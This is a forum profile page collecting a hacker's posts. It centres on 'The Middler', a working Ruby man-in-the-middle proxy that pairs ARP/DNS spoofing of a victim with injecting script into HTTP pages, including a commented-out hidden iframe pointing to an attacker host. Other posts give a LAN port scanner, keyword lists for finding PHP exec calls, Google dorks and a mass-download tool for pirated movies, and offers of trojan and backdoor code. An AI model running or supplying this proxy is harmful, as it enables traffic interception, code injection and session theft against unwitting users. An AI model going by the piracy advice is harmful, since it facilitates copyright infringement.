Jump to content

i8igmac

Dedicated Members
 View Profile  See their activity

  • Posts

    939

  • Joined

  • Last visited

  • Days Won

    22

 Content Type 

Posts posted by i8igmac

    automation, trailer.mp4 download from imdb,com

    in Questions

    Posted

    I have a orginized list of movies, I have autoated movie cover dl, actor image dl and movie description document...

    I'm compile this info into a website running on localhost. The most important feature is the trailer src that I strugle to automate this download... Omdb provides verry nice trailer that I hope to download OR just use the page/scrpt source...

    I can engineer a proper get request for a single download but I notice its not consistent src location...

    If some one can look at page src of i a mdb trailer. I don't have java script skill to defeat there security they try to prevent this...

    I'm open for ideas, iframe src could be the main page but this is sloppy and I want to isolate the vido only....

    Build A Web Scanner... Grep Document Write?

    in Questions

    Posted · Edited by i8igmac

    Now this is just a example, im looking for help on building a list or a dictionary

    i have built a few scanners and crawlers, i have a idea... im sure its already been done but i like to do things my way...

    lets say you use wget to crawl and download a entire site, now you have all contents download into tmp directory then use a linux command like grep(just for example) to find a string...

    cat /tmp/site_crawl/ * | grep exec

    echo exec(var)

    echo pcntl_exec(var)

    ...

    example of a list i would like to build...

    passthru

    system

    exec

    pcntl_exec

    `` (backtick operator)

    im looking for a universal list for finding ALL possibility's, not just php... i guess the goal is to find a way to execute or write data on the server...

    maybe there are vulnerabilities for css, java, php etc... any string that may need further investigation...

    this is just example, im sure you will never find any php exec etc in plain text...

    Megaupload

    in Everything Else

    Posted

    I have made a tool that will mass download from megaupload, huge time saver. There is no capture images (security image) so this makes my script simple...

    As a paid user my tool could download 200 files at a time or as a free user 1 at a time with 30 second wait time...

    Another feature is a Google crawl to find what ever file your looking for and if the links are still working...

    Here is a tip, can be used with other file shares

    Google search:

    Inurl:"forum" intext:"megaupload.com/?d=" intext:"movie-file-name-year-2012" blueray

    Megaupload

    in Everything Else

    Posted

    I have made a tool that will mass download from megaupload, huge time saver. There is no capture images (security image) so this makes my script simple...

    As a paid user my tool could download 200 files at a time or as a free user 1 at a time with 30 second wait time...

    Another feature is a Google crawl to find what ever file your looking for and if the links are still working...

    Here is a tip, can be used with other file shares

    Google search:

    Inurl:"forum" intext:"megaupload.com/?d=" intext:"movie-file-name-year-2012" blueray

    Trace Alert

    in Questions

    Posted

    Hollywood sort of false advertise 'hacking'

    This is a big reason why I spent endless hours learning.

    "what is a cookie virus" from 1995 the movie hackers a cookie scrolls across the screen and supposavly eats up memery... A cookie is used when your web browser logs into a server, this cookie could be sniffed or stolen and give a hacker access to these websites

    This was my first question ;p

    The Middler

    in Questions

    Posted

    I have updated the above script, when the string is found "<head>" the script insert's a small hello world script right after and modify's the content-length of the current packet to make room for the extra data...

    all pages load properly and now i feel successful 

    HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
P3P: CP="Facebook 
Set-Cookie: _e_0xIM_4=deleted
X-Cnection: close
Date: Fri, 13 Jan 2012 02:58:17 GMT
Content-Length: 110

&lt;html&gt;&lt;head&gt;&lt;title&gt;&lt;/title&gt;&lt;/head&gt;&lt;body&gt;&lt;span id="fbEmuTrackingSuccess"&gt;Success&lt;/span&gt;&lt;/body&gt;&lt;/html&gt;

    Only if the packet includes "Content-length:" AND the desired string "<head>" then the exploit will be inserted...

    I have tried, searching for other strings like <script> <head> <body> etc... they all produce the same resaults

    the problem is, what if none of these exist? then no pages will be modified...

    what if there are several packets responding to one Get request that match up with my desired algorithm then there may be 10 exploits inserted on one page...

    The Middler

    in Questions

    Posted · Edited by i8igmac

    For testing, set your proxy settings for your browser to 80... my goal is to have all pages modified and still load perfectly...

    my last test script

    require 'eventmachine'

attacker_ip="192.168.1.136"
victim="192.168.1.110"
gateway="192.168.1.1"


dns = File.open("dns", "w+")
dns.write("#{attacker_ip}        *.*")# this is your ip,
dns.close
#"1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 ".split(/ /, 10).join
#
# set proxy settings in firefox to port 80
#      uncommment these lines when you want to use arpsoof/dns
#`pkill spoof`
#a=Thread.new{system"xterm -e 'arpspoof -i wlan0 -t #{victim} #{gateway}'"}
#c=Thread.new{system"xterm -e 'arpspoof -i wlan0 -t #{gateway} #{victim}'"}
#b=Thread.new{system"xterm -e 'dnsspoof -i wlan0 -f dns'"}
#a.run
#b.run
#c.run
Thread.start{
class Client &lt; EM::Connection
        def initialize(other, finger, *args, &amp;blk)
		@other, @finger = other, finger
		super(*args, &amp;blk)
	end


        def post_init
          send_data @finger.sub("Accept-Encoding:","Assept-Ensoding:")
	end


        def receive_data(response)

	 clength = response.scan(/Content-Length: \d+/).to_s.sub("Content-Length: ","")
	  #clength = response.scan(/Content-Length: \d+/).to_s.split.slice(1).to_i #+ 17
	  #puts clength = response.scan(/Content-Length: \d+/)
	  #puts clength
	  #print "\n"
	  if response.scan("Content-Length: ").to_s == "" #&amp;&amp; response.scan("&lt;body&gt;").to_s == ""
		@other.send_data response


		else

			if response.scan("&lt;head&gt;").to_s == ""
				@other.send_data response
				else
					exploit="&lt;script&gt;alert('hello world')&lt;/script&gt;"
					math=exploit.length
					puts response
			#@other.send_data response.sub("&lt;/title&gt;","&lt;/titlE&gt;\n&lt;iframe src='http://192.168.1.103:8181/lol' width='0' height='0' &lt;/iframe&gt;\n").sub("Content-Length: #{clength}","Content-Length: #{clength-clength}")
			#@other.send_data response.sub("&lt;/title&gt;","&lt;/titlE&gt;&lt;script&gt;alert('hellow world')&lt;/script&gt;").sub("Content-Length: #{clength}","Content-Length: #{clength-clength}") 
			@other.send_data response.sub("&lt;head&gt;","&lt;head&gt;#{exploit}").sub("Content-Length: #{clength}","Content-Length: #{clength.to_i+math}")
			# .split(/ /, 9).join   delete 9 blank spaces

			end
		end
        end




      end
      #browser open to http://192.168.1.114
      module EchoServer
       def receive_data(finger) #finger is the header recived from the client, could log these cookies or log these pages

          #host = finger.to_a[1].chomp[6..-1]
	  #host = finger.gsub(" ","").split[1].chomp[5..-1]
#Thread.start{ 
	 ping = finger.gsub(" ","").index("Host:")
	 pong = finger.gsub(" ","").index("\n",ping)
	 host = finger.gsub(" ","")[ping..pong].gsub("Host:","").chomp

	 #i dont know if this will prevent loading from cache
	 data=finger.sub("If-None-Match:","If-None-MutXX:").sub("If-Modified-Since:","If-Modified-SXnce:")
          #print finger
	  #puts host


          EventMachine::connect host, 80, Client, self, data # ask google for data
	end
end
}
      EventMachine::run {
        EventMachine::start_server attacker_ip, 80, EchoServer
      }        #             YOUR IP

    Set Global

    in Questions

    Posted · Edited by i8igmac

    Your meterpreter payload, is it reverse TCP? If so then you need to forward one more port to your bt5 machine, by default mtererpreter use's port 4444.

    I don't see why port forwarding is a bad idea

    Here is a tip for monitoring connection's works with linux or windows, on windows you may need to run cmd as administer

    Netstat -np

    The Middler

    in Questions

    Posted · Edited by i8igmac

    I would like to share a script i put together about a year ago... it was a lot of fun building and there are so many other directions i could go with this script...

    its a little hard to explain but here goes...

    first thing is starting up your arpspoof/dnsspoof and listen for traffic on port 80

    (victim GET/facebook/with user123 cookies) ---> (evil-proxy GET /facebook/with user123 cookies) ---> (facebook.com) -->response(evil-proxy-MODIFY-DATA)--->response(victim)

    im working on a few problems right now, when you add bytes to the packet you have to change the frame length or else the page will load in the victim browser with incomplete code (the bottom half is missing)

    I think i just figured it out... Total length is 1500 or '05 dc'

    0000 00 15 00 48 8f c5 00 1a 73 91 01 9c 08 00 45 00 ...H.... s.....E.

    0010 05 dc a4 d9 40 00 40 06 0b fc c0 a8 01 88 c0 a8 ....@.@. ........

    with some math ill have to change this value

    But here... give this a try...

    install ruby with eventmachine...

    close any application that has port 80 already in use

    The Middler

    in Questions

    Posted

    I have done a lot of testing with mitm attacks, i have tested all the tools mentioned in the video and many more...

    my goal was to insert malicious code into 100% http tcp protocal, a good proof of concept or control point could be as simple as the use of a <iframe src="evil.com">

    with all my testing, the most effective set up was dns spoofing all the traffic to my own ruby proxy running on port 66 that would modify the header fields, insert my evil code and send the packet to the client...

    i could never get 100% efficiency... but my lab setup was limited...

    Ruby Port Scanner. Works With Droid

    in Applications & Coding

    Posted · Edited by i8igmac

    Install irb on your droid. It's just a quick scanner I use for discovering services on my network... When I need to find my ftp server or rdp... No need to root your device...

    Example: nmap -p 135,139,445,5900,8080,80,21,22 192.168.1.1-255

     require 'socket'

Thread.start{
for ip in 1..255
for port in [135,139,445,5900,80,8080,21,22]
Thread.start{ 
begin
  t = TCPSocket.open("192.168.1.#{ip.to_s}", port) 

rescue  
print "e"
else
t.close
puts""
puts "#{ip}:#{port} open ports!!!"

end}
sleep 0.1
end
end
}

    Notes, if it crashes irb, set the sleep to 0.2 or higher. Your phone is limited on threads

    The ip address must look like this*

    "192.169.1.#{ip.to_s} "

    "192.168.#{ip.to_s}.1"

    "xxx.#{ip.to_s}.x.x"

    "#{ip.to_s}.66.66.66"

    You can add more ports,

    Solid State Hard Drive, Crash Failure...

    in Questions

    Posted

    i think my solid state hard drive crashed... so i just boot up from a live cd and tried to mount the hard drive and got this error

    Message from syslogd@mint at Oct 24 20:28:07 ...
 kernel:[  135.498149] Oops: 0000 [#1] SMP 

Message from syslogd@mint at Oct 24 20:28:07 ...
 kernel:[  135.498151] last sysfs file: /sys/module/crc16/initstate

Message from syslogd@mint at Oct 24 20:28:07 ...
 kernel:[  135.498194] Process mount (pid: 3176, ti=f3562000 task=f656a640 task.ti=f3562000)

Message from syslogd@mint at Oct 24 20:28:07 ...
 kernel:[  135.498195] Stack:

Message from syslogd@mint at Oct 24 20:28:07 ...
 kernel:[  135.498204] Call Trace:

Message from syslogd@mint at Oct 24 20:28:07 ...
 kernel:[  135.498276] Code: 5b 5e 5f 5d c3 55 57 89 c7 56 53 e8 42 d6 12 00 8b 5f 04 83 c9 ff 8b 77 08 8b 2d b4 97 27 c1 eb 12 8b 14 8d f0 9c 3b c1 8b 47 14 &lt;8b&gt; 04 10 99 01 c3 11 d6 41 ba 20 00 00 00 89 e8 e8 aa 48 ff ff 

Message from syslogd@mint at Oct 24 20:28:07 ...
 kernel:[  135.498290] EIP: [&lt;c1140649&gt;] __percpu_counter_sum+0x26/0x50 SS:ESP 0068:f3563d20

Message from syslogd@mint at Oct 24 20:28:07 ...
 kernel:[  135.498292] CR2: 0000000001bee000

    Premeum Hosting/php With Ruby?

    in Questions

    Posted

    Im looking to start my own forum, there are a few questions i have, i would like to start with a server from home but im not sure how to get traffic... what services would you recommend... i have read a little bit on meta tags but read this is no promise to bring traffic so maybe i could see some examples on how you have used meta tags to increase traffic on your site...

    i have my own tools i code with ruby to perform small useful task for the site, so if i manage to get a forum up and fully functional i would then pay for a premaum service but are there any that include ruby?

    Building Your Own Client With Wireshark...

    in Questions

    Posted

    i have built a lot of my own client tools with ruby to perform small automated task's. example http, ftp, ssh...

    i used to host public servers for games like warcraft3 and counterstrike... i would like to build a client to connect to one of my servers to say "hello world"

    require 'socket'
server=socket.open("192.168.1.109", "6113")
server.puts("data.needed.to.establish.connection")
server.recv
server.puts("data.needed.to.look.as.legit.client")
server.recv
server.puts("and more data")
server.recv
server.puts("hello to all people in the public server")
server.recv
exit

    what i have done so far...

    ill start up wireshark to start a live capture then with my game client ill connect to the server... now im trying to reduplicate in ruby what i see in wireshark...

    is there a easy way to build a tool with this data i see in wireshark??? any one have experience with this?

    Advice/help For A New Hacker

    in Questions

    Posted

    a basic understanding of how server and client software work, i think would be a good start... for example install your first ftp server and properly configure your router, then have a friend from out side your home network download some files from your first ftp server...

    google 'ftp server install tutorial'

    google 'ftp server port forwarding'

    google 'ftp client tutorial'

    once you understand the difference between a client/server, things will make sense later on... (expression crawl before you walk)

    i would pick a scripting language like perl/python/ruby... (RUBY!!!) i would go with ruby, i have a lot of fun working with sockets, learn how 2 computers communicate over the internet is very interesting and fun to learn... i could show you ruby example code for trojin/malware/rootkit Always lots of fun coding these!

    get your self 2 computers at home and practice with netcat.exe (google netcat backdoor tutorial) you would have fun with this...

    Shell Script & Program Menus

    in Questions

    Posted · Edited by i8igmac

    i thought i would share a quick example. im not sure what it is you want... you could accomplish anything with other scripting (learn ruby !!!)

    save autoset.txt and execute this ruby script with root, SET needs root privileges

    ## autoset.txt

    2
1
2
xfinity.comcast.net/constantguard/Alerts/
2
2
666
no
777

    #sudo ruby script.rb
if `date`[0..2] == "mon"#Monday
      puts "lets do somehting"
      Thread.new { system("xterm -e 'xterm -e './set-automate autoset.txt''") }
  else
  puts "today is not Monday!"
end

    Google Dorks, For Finding Hd Movie

    in Questions

    Posted

    (inurl:"forum" intext:"Lincoln Lawyer" intext:"megaupload.com/?d")

    im looking for advice on improving this google search.

    if you view google with that search, you will find a working link a few pages into the search (enjoy ,-P)

    google outputs something like this

    The.Lincoln.Lawyer.DVDRip.XviD-TARGET

    ideees.xxx/forum/index.php?topic=376590.0 - Cached

    You +1'd this publicly. Undo

    Jul 1, 2011 – The Lincoln Lawyer (2011) Retail Date ..|.. 12-07-2011. Release Date ..|.. 28-06-2011. Source ..|. ... hxxp://xxx.megaupload.com/?d=1C02NXIN ...

    im looking for help on increasing the size of the response google gives me, the 3 dots after the link! maybe i can modify the search to give all links that include megaupload... any tips that would give me better results please share

    The.Lincoln.Lawyer.DVDRip.XviD-TARGET
ideees.xxx/forum/index.php?topic=376590.0 - Cached
You +1'd this publicly. Undo
Jul 1, 2011 – The Lincoln Lawyer (2011) Retail Date ..|
hxxp://megaupload.com/?d123451
hxxp://megaupload.com/?d123452
hxxp://megaupload.com/?d123453
hxxp://megaupload.com/?d123454
hxxp://megaupload.com/?d123455
hxxp://megaupload.com/?d123456
hxxp://megaupload.com/?d123457

    i made a script that will process each link one at a time (as a free user) threw ruby sockets.

    the time it takes searching threw that google response manually is time consuming... a search function will complete my script 8-X

×
×
  • Create New...